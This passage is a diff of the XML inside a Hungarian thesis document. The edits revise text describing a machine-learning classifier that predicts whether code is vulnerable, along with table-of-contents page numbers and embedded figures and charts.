           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>a test_bmodel metódus</w:t>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>classifier</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> metódus</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17962,13 +18106,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> az algoritmusokat, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>aminek az eredményét a 3.</w:t>
+        <w:t xml:space="preserve"> az algoritmusokat, aminek az eredményét a 3.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17998,25 +18136,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Látható, hogy a Gaussian Naive Bayes éri el a legnagyobb értéket 73,9%-os pontossággal. Bár minden futás során újragerenálódnak ezek az értékek, de a végeredmény ugyan az: a GaussianNB 73% és 77% közötti Recall értékkel az első helyen marad, így a tanulást már ez az algoritmus végzi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a classifier met</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ódus </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>segítségével.</w:t>
+        <w:t xml:space="preserve"> Ekkor automatikusan kiválasztja a legnagyobb értékhez tartozó osztályozót</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és meghívja rá a classifier2 metódust</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18103,26 +18235,26 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> a korábbi </w:t>
+        <w:t xml:space="preserve"> a korábbi fejezetben,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hogy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a Confusion Matrix Recall értéke a leghasznosabb, ha egy </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>fejezetben,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> hogy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a Confusion Matrix Recall értéke a leghasznosabb, ha egy kód sérülékenységéről van sz</w:t>
+        <w:t>kód sérülékenységéről van sz</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18179,55 +18311,61 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">az </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>adatkészlet tanításához elkülönített részét</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>használja fel</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a két állapot</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>megkülönböztetésére</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> megalkotva ezzel a program gépi tanulási modelljét.</w:t>
+        <w:t>a paraméterben megadott tanító és tesztelő adatok alapján képzi és értékeli ki a szintén paraméterbeli osztályozót.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Kimenet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>e a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> test_bmodel által visszaadott metrika</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, valamint kiírja, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a ciklus hanyadik futásnál jár</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, a korábban említett metrikát és az osz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ályozó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>t.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18258,10 +18396,30 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a paraméterként megadott osztályozóval </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">becslést ad a paraméterként megadott </w:t>
+        <w:t xml:space="preserve">becslést ad a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">szintén </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">megadott </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18296,27 +18454,55 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Kiírja többek között annak a valószínűségét, hogy a vektor sérülékeny, annak a valószínűségét, hogy nem sérülékeny </w:t>
+        <w:t xml:space="preserve"> Kiírja többek között </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">és </w:t>
+        <w:t xml:space="preserve">az osztályozót, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>ennek fényében az osztályozás eredményét.</w:t>
+        <w:t>az osztályozás eredményét</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>annak a valószínűségét, hogy a vektor sérülékeny</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> valószínűségét, hogy nem sérülékeny.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve"> A 3.</w:t>
       </w:r>
       <w:r>
@@ -18345,7 +18531,21 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">s ábra első három </w:t>
+        <w:t xml:space="preserve">s ábra </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>utolsó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> három </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18374,14 +18574,13 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="526B0DE2" wp14:editId="70008578">
-            <wp:extent cx="2660650" cy="1497248"/>
-            <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
-            <wp:docPr id="2" name="Kép 2" descr="A képen asztal látható&#10;&#10;Automatikusan generált leírás"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65A3497D" wp14:editId="0FB8D669">
+            <wp:extent cx="4468820" cy="1695450"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
+            <wp:docPr id="17" name="Kép 17"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -18389,17 +18588,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="2" name="Kép 2" descr="A képen asztal látható&#10;&#10;Automatikusan generált leírás"/>
+                    <pic:cNvPr id="1" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -18407,7 +18600,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2667178" cy="1500921"/>
+                      <a:ext cx="4492620" cy="1704480"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -18721,7 +18914,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>rt első két sor valószínűség</w:t>
+        <w:t xml:space="preserve">rt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>utolsó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> két sor valószínűség</w:t>
       </w:r>
       <w:r>
         <w:rPr>

--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -1724,7 +1724,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1798,7 +1798,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1872,7 +1872,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1963,7 +1963,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2055,7 +2055,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2145,7 +2145,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2235,7 +2235,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2326,7 +2326,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2419,7 +2419,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2510,7 +2510,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2603,7 +2603,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2695,7 +2695,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2787,7 +2787,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2879,7 +2879,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2971,7 +2971,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>14</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3063,7 +3063,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3156,7 +3156,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3249,7 +3249,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>16</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3340,7 +3340,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>18</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3431,7 +3431,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>22</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3505,7 +3505,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>23</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3579,7 +3579,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>24</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3653,7 +3653,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>25</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3727,7 +3727,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>26</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -16492,6 +16492,12 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve">, amelyeket megkülönböztetünk egymástól </w:t>
       </w:r>
       <w:r>
@@ -16604,13 +16610,25 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> A paraméterek változókba helyezésén kívül még inicializál</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>va van egy számláló (</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ez utóbbit </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a kód automatikusan számolja ki</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> úgy, hogy későbbiekben az </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16618,13 +16636,25 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>word_freqs</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>), két szótár (</w:t>
+        <w:t>X</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vektorok ~10%-a csorduljon túl az értéken. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A paraméterek változókba helyezésén kívül még inicializál</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>va van egy számláló (</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16632,7 +16662,37 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>word2index, indextoword</w:t>
+        <w:t>word_freqs</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>), két szótár (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word2index, index</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16656,13 +16716,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>(</w:t>
+        <w:t xml:space="preserve"> (</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17169,7 +17223,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> hossza kevesebb, mint a </w:t>
+        <w:t xml:space="preserve"> hossza </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">kevesebb, mint a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17207,14 +17268,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> a vektorok hossza </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>egységes marad.</w:t>
+        <w:t xml:space="preserve"> a vektorok hossza egységes marad.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17298,10 +17352,10 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D9F5D49" wp14:editId="1BAC2234">
-            <wp:extent cx="3553132" cy="1866900"/>
-            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
-            <wp:docPr id="3" name="Kép 3"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="254682E4" wp14:editId="3C00B6D2">
+            <wp:extent cx="3638550" cy="1944127"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="18" name="Kép 18"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -17321,7 +17375,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3560234" cy="1870631"/>
+                      <a:ext cx="3654117" cy="1952445"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -18169,6 +18223,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">test_bmodel: </w:t>
       </w:r>
       <w:r>
@@ -18247,14 +18302,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> a Confusion Matrix Recall értéke a leghasznosabb, ha egy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>kód sérülékenységéről van sz</w:t>
+        <w:t xml:space="preserve"> a Confusion Matrix Recall értéke a leghasznosabb, ha egy kód sérülékenységéről van sz</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18461,21 +18509,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">az osztályozót, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>az osztályozás eredményét</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+        <w:t xml:space="preserve">az osztályozót, az osztályozás eredményét, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18574,6 +18608,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
@@ -19004,7 +19039,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Emellett további információkat is szolgáltat többek között a</w:t>
+        <w:t xml:space="preserve"> Emellett </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>további információkat is szolgáltat többek között a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19048,6 +19090,16 @@
         </w:rPr>
         <w:t>, valamint megjeleníti a korábban megadott kódot és a program futási idejét.</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19139,7 +19191,136 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">meghatározza azt, hogy a kód milyen valószínűséggel sérülékeny. </w:t>
+        <w:t xml:space="preserve">meghatározza azt, hogy milyen valószínűséggel </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tartozik a sérülékeny és nem sérülékeny osztályba.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="dto3"/>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C1E08E4" wp14:editId="27480BEA">
+            <wp:extent cx="4572000" cy="2743200"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="3" name="Diagram 3">
+              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E819C3E-FB91-491C-857B-CEF457AAEF63}"/>
+                </a:ext>
+              </a:extLst>
+            </wp:docPr>
+            <wp:cNvGraphicFramePr/>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
+                <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId18"/>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>4.1-es ábra:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="613C2654" wp14:editId="5B974865">
+            <wp:extent cx="4572000" cy="2743200"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="16" name="Diagram 16">
+              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1703B93-3F32-45C6-B558-B9193F0D28C8}"/>
+                </a:ext>
+              </a:extLst>
+            </wp:docPr>
+            <wp:cNvGraphicFramePr/>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
